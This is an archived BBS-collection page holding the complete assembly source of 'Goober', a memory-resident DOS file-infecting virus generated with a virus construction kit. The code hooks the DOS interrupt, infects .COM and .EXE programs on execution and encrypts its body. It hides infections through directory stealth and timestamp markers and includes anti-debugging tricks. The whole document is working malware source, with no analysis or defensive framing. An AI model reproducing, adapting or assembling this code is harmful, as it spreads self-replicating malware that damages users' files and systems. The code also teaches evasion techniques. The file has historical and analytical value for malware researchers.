home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / goober.asm < prev    next >
Assembly Source File  |  1994-04-11  |  15KB  |  447 lines

  1. ; Goober.asm : Goober (c) by HypoDermic!! Part of the Mayberry Family!!!
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  4. PING            equ     0D052h
  5. PONG            equ     0AE9Ah
  6. STAMP           equ     22
  7. MARKER          equ     06864h
  8.  
  9. code            segment
  10.                 org     0
  11.                 assume  cs:code,ds:code
  12.  
  13. start:
  14.                 db      0E9h,3,0          ; to virus
  15. host:
  16.                 db      0CDh,20h,0        ; host program
  17. virus_begin:
  18.  
  19.                 db      0BBh                    ; decryption module
  20. code_offset     dw      offset virus_code
  21.                 mov     cx,VIRUS_SIZE / 2 + 1
  22.                 db      0B8h
  23. cipher          dw      0
  24.  
  25. decrypt:
  26.                 xor     cs:[bx],ax
  27.                 add     bx,2
  28.                 sub     cx,1
  29.                 jnz     decrypt
  30.  
  31.  
  32. virus_code:
  33.                 call    $ + 3             ; BP is instruction ptr.
  34.                 pop     bp
  35.                 sub     bp,offset $ - 1
  36.  
  37.                 push    ds es
  38.  
  39.                 cli
  40.                 mov     ax,PING           ; mild anti-trace code
  41.                 push    ax
  42.                 pop     ax
  43.                 dec     sp
  44.                 dec     sp
  45.                 pop     bx
  46.                 cmp     ax,bx
  47.                 je      no_trace
  48.                 hlt
  49.  
  50. no_trace:
  51.                 sti
  52.                 in      al,21h            ; lock out & reopen keyboard
  53.                 xor     al,2
  54.                 out     21h,al
  55.                 xor     al,2
  56.                 out     21h,al
  57.  
  58.                 mov     ax,PING           ; test for residency
  59.                 int     21h
  60.                 cmp     dx,PONG
  61.                 je      installed
  62.  
  63.                 mov     ax,es                   ; Get PSP
  64.                 dec     ax
  65.                 mov     ds,ax                   ; Get MCB
  66.  
  67.                 sub     word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
  68.                 sub     word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
  69.                 mov     es,word ptr ds:[12h]
  70.  
  71.                 push    cs                      ; copy virus into memory
  72.                 pop     ds
  73.                 xor     di,di
  74.                 mov     si,bp
  75.                 mov     cx,(virus_end - start) / 2 + 1
  76.                 rep     movsw
  77.  
  78.                 xor     ax,ax                   ; capture interrupts
  79.                 mov     ds,ax
  80.  
  81.                 mov     si,21h * 4              ; get original int 21
  82.                 mov     di,offset old_int_21
  83.                 movsw
  84.                 movsw
  85.  
  86.                 mov     word ptr ds:[si - 4],offset new_int_21
  87.                 mov     ds:[si - 2],es          ; and set new int 21
  88.  
  89. installed:
  90.                 pop     es ds                   ; restore segregs
  91. com_exit:
  92.                 lea     si,[bp + host]          ; restore host program
  93.                 mov     di,100h
  94.                 push    di
  95.                 movsw
  96.                 movsb
  97.  
  98.                 call    fix_regs                ; fix up registers
  99.                 ret                             ; and leave
  100. exe_exit:
  101.                 mov     ax,ds                   ; fix up return address
  102.                 add     ax,10h
  103.                 push    ax
  104.                 add     ax,cs:[bp + exe_cs]
  105.                 mov     cs:[bp + return_cs],ax
  106.  
  107.                 mov     ax,cs:[bp + exe_ip]
  108.                 mov     cs:[bp + return_ip],ax
  109.  
  110.                 pop     ax
  111.                 add     ax,cs:[bp + exe_ss]        ; restore stack
  112.                 cli
  113.                 mov     ss,ax
  114.                 mov     sp,cs:[bp + exe_sp]
  115.  
  116.                 call    fix_regs                ; fix up registers
  117.                 sti
  118.  
  119.                 db      0EAh                    ; back to host program
  120. return_ip       dw      0
  121. return_cs       dw      0
  122.  
  123. exe_cs          dw      -16                     ; orig CS:IP
  124. exe_ip          dw      103h
  125. exe_sp          dw      -2                      ; orig SS:SP
  126. exe_ss          dw      -16
  127.  
  128. fix_regs:
  129.                 xor     ax,ax
  130.                 cwd
  131.                 xor     bx,bx
  132.                 mov     si,100h
  133.                 xor     di,di
  134.                 xor     bp,bp
  135.                 ret
  136.  
  137. ; interrupt 21 handler
  138. int_21:
  139.                 pushf
  140.                 call    dword ptr cs:[old_int_21]
  141.                 ret
  142.  
  143. new_int_21:
  144.                 cmp     ax,PING                 ; residency test
  145.                 je      ping_pong
  146.                 cmp     ah,11h                  ; directory stealth
  147.                 je      dir_stealth
  148.                 cmp     ah,12h
  149.                 je      dir_stealth
  150.                 cmp     ah,4Eh                  ; directory stealth
  151.                 je      dir_stealth_2
  152.                 cmp     ah,4Fh
  153.                 je      dir_stealth_2
  154.                 cmp     ax,4B00h                ; execute program
  155.                 jne     int_21_exit
  156.                 jmp     execute
  157. int_21_exit:
  158.                 db      0EAh                    ; never mind ...
  159. old_int_21      dd      0
  160.  
  161. ping_pong:
  162.                 mov     dx,PONG
  163.                 iret
  164.  
  165. dir_stealth:
  166.                 call    int_21                  ; get dir entry
  167.                 test    al,al
  168.                 js      dir_stealth_done
  169.  
  170.                 push    ax bx es
  171.                 mov     ah,2Fh
  172.                 int     21h
  173.  
  174.                 cmp     byte ptr es:[bx],-1     ; check for extended FCB
  175.                 jne     no_ext_FCB
  176.                 add     bx,7
  177. no_ext_FCB:
  178.                 mov     ax,es:[bx + 17h]        ; check for infection marker
  179.                 and     al,31
  180.                 cmp     al,STAMP
  181.                 jne     dir_fixed
  182.  
  183.                 sub     word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
  184.                 sbb     word ptr es:[bx + 1Fh],0
  185. dir_fixed:
  186.                 pop     es bx ax
  187. dir_stealth_done:
  188.                 iret
  189.  
  190. dir_stealth_2:
  191.                 pushf
  192.                 call    dword ptr cs:[old_int_21]
  193.                 jc      dir_stealth_done_2
  194.  
  195. check_infect2:
  196.                 push    ax bx es
  197.  
  198.                 mov     ah,2Fh
  199.                 int     21h
  200.                 mov     ax,es:[bx + 16h]
  201.                 and     al,31                   ; check timestamp
  202.                 cmp     al,STAMP
  203.                 jne     fixed_2
  204.  
  205.                 sub     es:[bx + 1Ah],VIRUS_SIZE + 3
  206.                 sbb     word ptr es:[bx + 1Ch],0
  207.  
  208. fixed_2:
  209.                 pop     es bx ax
  210.                 clc                             ; clear carry
  211. dir_stealth_done_2:
  212.                 retf    2
  213. execute:
  214.                 push    ax bx cx dx si di ds es
  215.  
  216.                 call    get_extension           ; check filename
  217.                 cmp     es:[di - 3],'DN'        ; skip if COMMAND
  218.                 jne     open_it
  219.                 jmp     cant_open
  220.  
  221. open_it:
  222.                 xor     ax,ax                   ; critical error handler
  223.                 mov     es,ax                   ; routine - catch int 24
  224.                 mov     es:[24h * 4],offset int_24
  225.                 mov     es:[24h * 4 + 2],cs
  226.  
  227.                 mov     ax,4300h                ; change attributes
  228.                 int     21h
  229.  
  230.                 push    cx dx ds
  231.                 xor     cx,cx
  232.                 call    set_attributes
  233.  
  234.                 mov     ax,3D02h                ; open file
  235.                 int     21h
  236.                 jc      cant_open
  237.                 xchg    bx,ax
  238.  
  239.                 push    cs                      ; CS = DS
  240.                 pop     ds
  241.  
  242.                 mov     ax,5700h                ; save file date/time
  243.                 int     21h
  244.                 push    cx dx
  245.                 mov     ah,3Fh
  246.                 mov     cx,28
  247.                 mov     dx,offset read_buffer
  248.                 int     21h
  249.  
  250.                 cmp     word ptr read_buffer,'ZM' ; .EXE?
  251.                 je      infect_exe              ; yes, infect as .EXE
  252.  
  253.                 mov     al,2                    ; move to end of file
  254.                 call    move_file_ptr
  255.  
  256.                 cmp     dx,65279 - (VIRUS_SIZE + 3)
  257.                 ja      dont_infect             ; too big, don't infect
  258.  
  259.                 sub     dx,VIRUS_SIZE + 3       ; check for previous infection
  260.                 cmp     dx,word ptr read_buffer + 1
  261.                 je      dont_infect
  262.  
  263.                 add     dx,VIRUS_SIZE + 3
  264.                 mov     word ptr new_jump + 1,dx
  265.  
  266.                 add     dx,103h
  267.                 call    encrypt_code            ; encrypt virus
  268.  
  269.                 mov     dx,offset read_buffer   ; save original program head
  270.                 int     21h
  271.                 mov     ah,40h                  ; write virus to file
  272.                 mov     cx,VIRUS_SIZE
  273.                 mov     dx,offset encrypt_buffer
  274.                 int     21h
  275.  
  276.                 xor     al,al                   ; back to beginning of file
  277.                 call    move_file_ptr
  278.  
  279.                 mov     dx,offset new_jump      ; and write new jump
  280.                 int     21h
  281.  
  282. fix_date_time:
  283.                 pop     dx cx
  284.                 and     cl,-32                  ; add time stamp
  285.                 or      cl,STAMP                ; for directory stealth
  286.                 mov     ax,5701h                ; restore file date/time
  287.                 int     21h
  288.  
  289. close:
  290.                 pop     ds dx cx                ; restore attributes
  291.                 call    set_attributes
  292.  
  293.                 mov     ah,3Eh                  ; close file
  294.                 int     21h
  295.  
  296. cant_open:
  297.                 pop     es ds di si dx cx bx ax
  298.                 jmp     int_21_exit             ; leave
  299.  
  300.  
  301. set_attributes:
  302.                 mov     ax,4301h
  303.                 int     21h
  304.                 ret
  305.  
  306. dont_infect:
  307.                 pop     cx dx                   ; can't infect, skip
  308.                 jmp     close
  309.  
  310. move_file_ptr:
  311.                 mov     ah,42h                  ; move file pointer
  312.                 cwd
  313.                 xor     cx,cx
  314.                 int     21h
  315.  
  316.                 mov     dx,ax                   ; set up registers
  317.                 mov     ah,40h
  318.                 mov     cx,3
  319.                 ret
  320. infect_exe:
  321.                 cmp     word ptr read_buffer[26],0
  322.                 jne     dont_infect             ; overlay, don't infect
  323.  
  324.                 cmp     word ptr read_buffer[16],MARKER
  325.                 je      dont_infect             ; infected already
  326.  
  327.                 les     ax,dword ptr read_buffer[20]
  328.                 mov     exe_cs,es               ; CS
  329.                 mov     exe_ip,ax               ; IP
  330.  
  331.                 les     ax,dword ptr read_buffer[14]
  332.                 mov     exe_ss,ax               ; SS
  333.                 mov     exe_sp,es               ; SP
  334.                 mov     word ptr read_buffer[16],MARKER
  335.  
  336.                 mov     ax,4202h                ; to end of file
  337.                 cwd
  338.                 xor     cx,cx
  339.                 int     21h
  340.  
  341.                 push    ax dx                   ; save file size
  342.  
  343.                 push    bx
  344.                 mov     cl,12                   ; calculate offsets for CS
  345.                 shl     dx,cl                   ; and IP
  346.                 mov     bx,ax
  347.                 mov     cl,4
  348.                 shr     bx,cl
  349.                 add     dx,bx
  350.                 and     ax,15
  351.                 pop     bx
  352.  
  353.                 sub     dx,word ptr read_buffer[8]
  354.                 mov     word ptr read_buffer[22],dx
  355.                 mov     word ptr read_buffer[20],ax
  356.                 add     dx,100
  357.                 mov     word ptr read_buffer[14],dx
  358.  
  359.                 pop     dx ax                   ; calculate prog size
  360.  
  361.                 add     ax,VIRUS_SIZE + 3
  362.                 adc     dx,0
  363.                 mov     cx,512                  ; in pages
  364.                 div     cx                      ; then save results
  365.                 inc     ax
  366.                 mov     word ptr read_buffer[2],dx
  367.                 mov     word ptr read_buffer[4],ax
  368.                 mov     dx,word ptr read_buffer[20]
  369.                 call    encrypt_code            ; encrypt virus
  370.  
  371.  
  372.                 mov     ah,40h
  373.                 mov     cx,VIRUS_SIZE + 3
  374.                 mov     dx,offset encrypt_buffer
  375.                 int     21h
  376.  
  377.  
  378.                 mov     ax,4200h                ; back to beginning
  379.                 cwd
  380.                 xor     cx,cx
  381.                 int     21h
  382.  
  383.                 mov     ah,40h                  ; and fix up header
  384.                 mov     cx,28
  385.                 mov     dx,offset read_buffer
  386.                 int     21h
  387.                 jmp     fix_date_time           ; done
  388.  
  389. courtesy_of     db      '[BW]',0
  390. signature       db      'Goober (c) by HypoDermic!! Part of the Mayberry Family!!!',0
  391.  
  392. get_extension:
  393.                 push    ds                      ; find extension
  394.                 pop     es
  395.                 mov     di,dx
  396.                 mov     cx,64
  397.                 mov     al,'.'
  398.                 repnz   scasb
  399.                 ret
  400.  
  401. encrypt_code:
  402.                 push    ax cx
  403.  
  404.                 push    dx
  405.                 xor     ah,ah                   ; get time for random number
  406.                 int     1Ah
  407.  
  408.                 mov     cipher,dx               ; save encryption key
  409.                 pop     cx
  410.                 add     cx,virus_code - virus_begin
  411.                 mov     code_offset,cx          ; save code offset
  412.  
  413.                 push    cs                      ; ES = CS
  414.                 pop     es
  415.  
  416.                 mov     si,offset virus_begin   ; move decryption module
  417.                 mov     di,offset encrypt_buffer
  418.                 mov     cx,virus_code - virus_begin
  419.                 rep     movsb
  420.  
  421.                 mov     cx,VIRUS_SIZE / 2 + 1
  422. encrypt:
  423.                 lodsw                           ; encrypt virus code
  424.                 xor     ax,dx
  425.                 stosw
  426.                 loop    encrypt
  427.  
  428.                 pop     cx ax
  429.                 ret
  430.  
  431. int_24:
  432.                 mov     al,3                    ; int 24 handler
  433.                 iret
  434. new_jump        db      0E9h,0,0
  435.  
  436. virus_end:
  437. VIRUS_SIZE      equ     virus_end - virus_begin
  438. read_buffer     db      28 dup (?)              ; read buffer
  439. encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer
  440.  
  441. end_heap:
  442.  
  443. MEM_SIZE        equ     end_heap - start
  444.  
  445. code            ends
  446.                 end     start
  447.